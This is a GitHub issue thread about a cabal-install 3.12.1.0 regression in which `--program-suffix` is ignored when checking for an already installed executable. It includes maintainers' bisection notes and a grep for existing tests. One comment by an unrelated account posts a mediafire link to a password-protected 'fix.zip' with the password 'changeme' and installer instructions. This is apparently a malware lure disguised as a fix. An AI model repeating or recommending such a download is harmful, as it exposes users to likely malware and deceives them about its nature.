### ISSUE TITLE
Regression: `cabal-3.12.1.0 install` ignores `--program-suffix` when checking whether exe is already installed

### ISSUE THREAD

**Issue by andreasabel** [haskell/cabal#10290]
`cabal-3.12.1.0 install` wrongly ignores `--program-suffix` when checking whether exe is already installed:
```
$ cabal-3.12.1.0 install hello
...
Symlinking 'hello' to '/Users/test/.local/bin/hello'

$ cabal-3.12.1.0 install hello --program-suffix=-new
...
Error: [Cabal-7149]
Path '/Users/test/.local/bin/hello' already exists. Use --overwrite-policy=always to overwrite.
```
cabal-3.10.3.0 can still do this correctly:
```
$ cabal-3.10.3.0 install hello --program-suffix=-new
...
Symlinking 'hello' to '/Users/test/.local/bin/hello-new'
```
Regression possibly introduced by:
- ~~#10056 ATTN: @wismill~~
- https://github.com/haskell/cabal/commit/09c04e9aca5de2ca391eb859a5b295fdd617f5c6 ATTN: philderbeast

The `--program-suffix` feature likely needs more systematic regression tests.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ulysses4ever** [comment]
hey @wismill. As we're nearing 3.14.1.0 cabal-install, any chance you could take a look at this? It looks like in https://github.com/haskell/cabal/pull/10056 you modified the config flags inside the install action to "forget" about affixes in a big chunk of the action implementation. I suspect it should be limited...

**Comment by ulysses4ever** [comment]
I bisected it to 09c04e9aca5de2ca391eb859a5b295fdd617f5c6, cc @philderbeast Sorry @wismill!

@philderbeast any chance you could look into this regression from your patch?

**Comment by wismill** [comment]
Sorry, I have no time at the moment to work on this. But the key is maybe from [this comment](https://github.com/haskell/cabal/pull/10056#issuecomment-2132116654):

> Fixed by making the name of the executable in the store canonical, i.e.
always ignoring the program affix options.

I wonder it the following reported error:

> Path '/Users/test/.local/bin/hello' already exists. Use --overwrite-policy=always to overwrite.

merely reports an overwrite that would happen in the *store*, not in `~/.local/bin`.

It definitely needs a fix and a test for the use case of the current issue.

**Comment by philderbeast** [comment]
> @philderbeast any chance you could look into this regression from your patch?

I've had a quick look but this looks too big for me to handle within my schedule for the next month.

> The `--program-suffix` feature likely needs more systematic regression tests.

I could only find one test for `--program-suffix`, a test that includes that option to see "whether config options are commented or not".

```
$ grep -R 'program-suffix' ./**/*.hs
./cabal-install/src/Distribution/Client/ProjectConfig/Legacy.hs:        , "program-suffix"
./cabal-install/tests/IntegrationTests2.hs:  "-- program-suffix" @=? findLineWith True "program-suffix" defaultConfigFile
./Cabal/src/Distribution/Simple/Setup/Config.hs:          ["program-suffix"]
```

https://github.com/haskell/cabal/blob/cc2c9d8ef5ca7b4356c9beb96baddb46643d64ad/cabal-install/tests/IntegrationTests2.hs#L1984-L1985

https://github.com/haskell/cabal/blob/cc2c9d8ef5ca7b4356c9beb96baddb46643d64ad/cabal-install/tests/IntegrationTests2.hs#L2065
